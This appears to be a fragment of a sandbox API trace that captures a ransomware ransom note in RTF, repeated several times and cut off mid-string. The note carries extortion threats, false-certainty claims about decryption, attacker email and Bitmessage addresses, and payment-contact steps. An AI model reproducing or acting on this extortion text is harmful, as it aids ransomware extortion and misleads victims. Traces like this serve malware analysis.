w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.102] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 